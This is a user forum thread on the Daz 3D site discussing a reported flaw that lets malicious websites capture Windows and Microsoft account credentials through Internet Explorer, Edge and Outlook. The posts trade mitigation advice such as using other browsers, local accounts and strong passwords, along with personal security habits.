Windows users: IMPORTANT information about password exposure
Kendall Sears
Posts: 2,995
in The Commons
An old bug is back but much more problematic than before.
In case people don't want to read it all here is a way to mitigate the problem from the article.
"There's a simple mitigation, according to the group. Don't use Internet Explorer, Edge, or Microsoft Outlook, and don't log in to Windows with a Microsoft account.
Chrome and Firefox users aren't affected."
Please take appropriate measures.
Kendall
Daz 3D is part of 
Connect
DAZ Productions, Inc.
7533 S Center View Ct #4664
West Jordan, UT 84084
Licensing Agreement | Terms of Service | Privacy Policy | EULA
© 2025 Daz Productions Inc. All Rights Reserved.
Comments
Good to know I'm pretty safe then. I use Chrome and mail and other essential programs use ports of Linux programs in Windows. I refuse to signup for a Microsoft account, too.
1st Apple and now Microsoft. I remember trying to get Apple to close an account I don't use anymore but they wouldn't even after they were hacked into. As for my current password, they couldn't crack my password without the huge amount of parallel computing resources and it'd still take years for them to crack or an actual software bug, not a phishing attack. I have no LAN resources worth their while either and am protected against financial crimes by law. LOL, they can get my DAZ renders at the gallery.
Thanks though, a couple of businesses made me change my password in the last 6 months and those 2 passwords aren't that difficult to crack. Need to tighten them up.
...read this this Wednesday morning.
...dont have an MS/Windows account
...don't use IE
...don't use Outlook
I have an account for one drive, but recently upgraded my dropbox account, so won't use.
Dont' use W10, or anything else associated.
This information is typical of ZDNet which is definitely not my preferred source for security questions. MS will never fix this and I think you know why.
Like Nonesuch00 hinted there is no danger if you use strong authentication methods or strong passwords.
A search on the net for strong passwords techniques will bring up links like this one http://www.bu.edu/infosec/howtos/how-to-choose-a-password/
Strong authentication on the other hand is rather easy to set up but people don't like it. Nowadays it includes multi-factor authentication like Password + Pin code or sophisticated methods like Images + facial recognition.
Passwords are the major flaw here and if people use the windows internet authentication the password should definitely be strong.
I don't use MS cloud , or any of MS account products like outlook Hotmail or win 10... But I do use a 2 step verification for my Google partner account.. how that works is I log in regularly with user name and password and once i log in, google sends a txt notice that my Google account has been signed into and asked if it was me.. if I click yes google does nothing and i stay logged in. .. if I click no, it logs out my account and locks it out and google requires me make a password change when i sign back in using my security pin#,. It is a pain in the ass. but having had someone that has tried a few hundred times to change my passwords or gain access to steal my Google account I don't want to take any un necessary chance for my stalker to gain access even though i am sure he does it just to make my life miserable.
I refused to install Internet Explorer on my home PC. And I don't have Windows 10 either. And never will if I have my way. I only use Firefox or Chrome. Sadly my work applications only work in Internet Explorer (have no idea what they were thinking) so I am forced to use it at work. But my personal stuff only gets done on Firefox or Chrome while I am at work as well.
I believe Outlook is the worst. I've never used it (used Pegasus and now TheBat instead) and that's probably why I've only had 3 virus infections since I joined the internet in 1993, while I've seen people using Outlook getting infected again and again.
I have no problem with IE though, always been my main browser since the first version and never had an infection through it (my AV programs have blocked some malicious scripts but not many). The later versions of IE are much more secure than the earlier ones, in some respects more secure than the other browsers, according to tests.
You miss the point. MOST PEOPLE DON'T use strong authentication nor 2 factor. Those that do are likely security aware and are not likely users of MS internet tech to start with. This post and the ZDNET article are for the 90%+ of the MS user base who are susceptible to the exploit.
Kendall
I use W10 and Outlook, but don't have a MS account. I screen all incoming emails in my blackberry device and delete from said device as well. Any emails not received in my BB device are normally junk mail and sitting in junk mail folder when I do open up Outlook, which I then just auto delete. I never ever ever open an email if I do not recognize the sender or the subject. I use chrome as my browser.
I use a PIN code to log into Windows now but i'm not sure technically if Windows 10 & the online Windows webservices then use that pin to avoid sending my encrypted passwords over the internet via some obfusticating and more secure authentication scheme.
The juck mail I get is mostly via my Apple account that I asked them to delete a few years back but the refused.
I also now get junkmail via my outlook.com (hotmail / live / many names in the past for this online email) but that was my fault for accepting these L.I.O.N. networkers as connections in LinkedIn. I didn't know what that was a 1st but I've deleted all of those and don't accept anymore of those requests. Some, not all of them, harvest email address and such.
The biggest security flaw everyone has, regardless of OS or browser used is any online service that exposes your email address since that's the easiest and cheapest way to bypass most security measures with a convincing phishing email forgery. So LinkedIn and Facebook are two services you should be very careful with if you want to avoid phishing attempts. Of course, since almost every online service uses email as the username as the 1st step of authentication there is reason behind these efforts to harvest as many email addresses as possible.
So, I shouldn't have upgraded to Windows 10. This keeps getting better and better (<----- Sarcasm)
I only upgraded because the Window 10 upgrade window said about keeping security up to date...
How do you know if your passwords have been exposed?
Surely you need a Microsoft account to sign into Windows?
Is this problem just with Win 10, or is it 8.1 too?
It doesn't help having an "OCD driven" brain at times like these...
No I don't miss the point. Read again!
1. You don't know your passwords have been exposed until you can find them on some websites or someone logs into your account and maybe locks you out from MS services (in worst case the attacker changes your password and eventually you cannot even log into Windows then anymore, not sure on that though)..
2. You don't need a MS account to sign into Windows, you can install using a local account as well (though that option only comes on second or third screen when you refuse using a MS account on install). I don't use MS account for login, so I never tried, but following this article it's quite easy to switch a MS account to local account on Windows. Some apps might need your MS account data for manual login after that, as Windows cannot login automatically then - but that should be okay.
3. It's with Windows 8 and 8.1 as well.
Please understand, there is only a possible problem when you use your MS account data to log into Windows (which unfortunately is what Microsoft wants you to do at installation time). If you upgraded from previous Windows using a local account only, it doesn't change that and you're safe (as long as local account has it's own name/password combination). If you did a clean install and chose local account there's no real problem either - all that could be stolen eventually would be your local account name and hashed password combination, which simply doesn't matter if only used locally for your Windows login.
FYI: Windows 8/10 tries to access network shares (e.g. on your NAS) with the same name/password combination you use for login. If an attacker emulates a local network share on a website, IE and Edge send your login data and try to login, which is a problem if the very same data is used for e.g. outlook, cloud, MS store, etc. Just make sure you use local account on Windows 8/10 and it has its own name/password combination (even if that's an easy one), then your fine.
Edit: I forgot, after switching Windows to local account, if you think there's risk someone eventually stole your password already, you might want to go to https://login.live.com and change the password on your MS account then. It will be needed for logging into MS services and apps like skydrive, mail, ms store, etc. later.
I don't know if it's true or not, but I also read that because of legacy reasons, Windows passwords that are 7 characters or less use a different kind of encoding. And they decided for some reason to do the same with the next 7 characters. IOW, a 14 letter password is really 2x 7 letters. And is very easy to crack, even by brute force. So you need a password to be at least 15 characters long to have normal security.
same here ....yawwwnn back to work
This thread was meant more for those folks who have upgraded to Windows 10, selected the "Express Setup" which is the default (and also sets everything to ALL of the compromised apps), and weren't concerned about setting good passwords. This is a LOT of people.
Also, the "Windows Login" is NOT a necessary component for this exploit. The "Windows Login" makes it easier to get ALL of the cached passwords that have been entered since these are transferred to the online keyring. Even without a "Windows Login" the exploit will copy the credentials information from the machine's local setup. As stated IN THE ARTICLE the only way to avoid this particular exploit on Windows 10 is to NOT use the listed apps. Use of alternative applications is the currently recommended solution.
As for using strong authentication, this is ALWAYS a good idea. However, (and this is important) the method MS uses for password storage is well understood and has not changed over time. This means that there are lots of ways for the "bad guys" to retrieve the credentials stolen from compromised machines without a lot of work.
For those who are not susceptible, congratulations. For everyone else, please read the article and take appropriate measures before the worst happens.
Kendall
I recommend you read the article again. That's just wrong. ;)
The attack - or the proof of concept linked there - only retrieves credentials that Windows stored for access to network shares, because IE, Edge and Outlook allow access to local shares, but unfortunately don't block remote shares and try to login there as well. This was only called a flaw, as it didn't really affect security for most users who use a local account on Windows (which was default before Windows 8) - an attacker still needs local access to the PC to use this (well, as long as someone doesn't use some online name/password combinations for his local network shares too, which would be weird).
But when you set up Windows using a MS account (mail adress + password), it will use these MS account data when trying to connect to local and remote network shares too and include the mail adress + password hash. And now - after cracking the password hash - the attacker got access to your MS services like Skype, Outlook.com, XBOX, etc. THIS is why it's important to NOT use MS account to log into Windows.
Simple as that.
Suddenly grateful I switched over to Mac now. Apple ain't perfect, but at least I don't have to worry The Security Scare of the Week as much as I used to, lmao.
The exploit as listed in that article is only a synopsis of the exploit. The actual research report on it is signifiantly worse than the minimal coverage at zdnet.
EDIT: Please note that edge is also a full fledged PDF file viewer in addition to a browser. By default it is made the default viewer for PDF files using "Express Setup". This gives it access to the filesystem as well.
EDIT2: Also note that the article does reference that VPN connections can also have their credentials compromised with this exploit. Directly from the article: "Perfect Privacy, a virtual private networking (VPN) provider, said in a blog post that VPN connections are also affected. If a user visits a site while they're connected to a VPN, their credentials will also leak, potentially affecting the anonymity of the user." This, as well as the subtitle to the article, "The flaw, which allows a malicious website to extract user passwords, is made worse if a user is logged in with a Microsoft account." (emphasis mine) alludes to the seriousness of the exploit which is not covered in detail in the article.
Kendall
Thanks for the info Kendall. I'm one of those people that has no idea until someone warns me like this, and even then.... Seems like it's a good idea to just keep the computer that matters disconnected and take the precautions mentioned here with this computer. Thankfully I use none of the apps and services mentioned as being vulnerable. I currently use this computer to download via DIM to an external drive. Studio on my other computer has the folder on that drive mapped to install from. I will be installing 4.9 eventually and authentification will be the only reason that computer will connect. I currently am planning to use DIM still anyway.
You probably can't know for sure unless something happens that indicates it, but you can check here if you're among those who have had their data exposed in certain data breaches:
https://haveibeenpwned.com/
Considering the extent of the damage of such an eventuality, you presume you have, and change your passwords; nice long ones, full of random characters; then store them in encrypted format.
... And I consider Smart Phones to be inherently insecure.
And not OCD enough.
You'd have changed your passwords, not asked about how you can know, otherwise. I find it surprising how many folks find it inconvenient to exercise good password controls. Personally I find it pretty damn inconvenient having my bank account emptied, my credit cards maxed for me, or my identity stolen.
I agree, on all points. Weird passwords that make no sense are a necessity. Smart phones can and will be compromised, so I don't use mine for anything but straight up communication and to store music. Someone hacks my smart phone, all they'll get is a damn good set of songs to listen to. Change passwords, change passwords...and even then -- well, if the feds can be hacked, who are we to think we're safe?
I don't condone security breaches, but I doubt anyone can write a foolproof program. And even if there was such a thing, there'll always be a supersmart hacker out there, just waiting for a new challenge.
I do run Windows 10, and it updated itself yesterday when I rebooted to fix an issue with my headset. I think it updated to the August 2 anniversary update. When I went to sign in, my computer informed me I now had to use my windows credentials to sign in to my PC not the local password I had been using previously. It also had reset a lot of my options such as re-enabling Cortana, automatically signing me into Skype because they had pushed a Skype preview onto this computer, removing the serial number of my anti virus so it didn't start up, and some other things were also added that I didn't even want on my pc. Then to make it worse there is no way to roll back because it had deleted all the system restore points and also now says I have no Windows 10 updates installed so I can't roll back that way. I'm still trying to figure out what I need to do to get my PC back the way it was. Until this update I had no real issues with Windows 10 but now I am considering reinstalling the Windows 7 software that came with my PC originally.
I guess the Aug 2 update hasn't made it to me, yet. That is a major pain of W10, constant updates that eat up download gbs. Some have been security updates though, if I remember right, so that's good.
Back to the hacking...you all don't get emails from you to you, w/attachments that you have more sense than to open, much less download? Or emails from unknown sources, with headings like "Invoice that you requested?" When nobody ever requested an invoice? Hacking is everywhere. Our email addresses are sold, probably on a daily basis. The internet is a blessing and a curse, just like everything else. We just have to be as smart and sly as we can, and hope we get by relatively unscathed.
Sometimes I get the feeling my computer is an open book. I sure hope not, but I get an odd hunch sometimes. I'm tempted to start writing and/or rendering erotica, so the hackers will be embarassed or at least entertained, whichever suits 'em.
Today just might be that day.
well, FWIW, I use very strong random passwords that are at least 26 characters long and include ASCII Alt-code characters where I can, my network is behind a physical security appliance box (an older Cisco box), email gets previewed and deleted as needed from the server before downloading (you can do the same with a program called Mailwasher), I haven;t used an MKS browser since Mozilla/Firefox was availble, and Firefox runs adblockers and tracker blockers, has webRTC disabled, as well as running Noscript, Flash/Java is not installed, etc.. I think I've done pretty much what I can to keep things safe..
If anybody guesses my passwords, I feel kinda sorry for 'em.
I've got walls up, too, hacsart, but sometimes things slip thru the crack. And I've learned to spot a fake email a mile away.
I don't do much FB anymore. Signed up for Twitter, then wondered why I did it, so forget that. I just try to be careful. Oh, and I only frequent established forums.
Thanks for the replies.
@Taozen : Thanks for the link. I've saved it to my favorites.
I have OCD thoughts, but not always actions to go with it.
I don't store passwords on my computer. I've had friends telling me to do so, but I just can't. If anyone broke in and stole my stuff, I want to give them a bit of a challenge.
My computer hasn't been as good since the WIN 10 upgrade (especially on start up), so I may have no choice in regards to rolling back the OS (although, I really like using Win 10).
Sorry, I'm gonna bump this back up to the top --
I just remembered. Isn't a remote control program like...ha ha...RescueMe...necessary for anyone to really scope out what's on someone else's hard drive?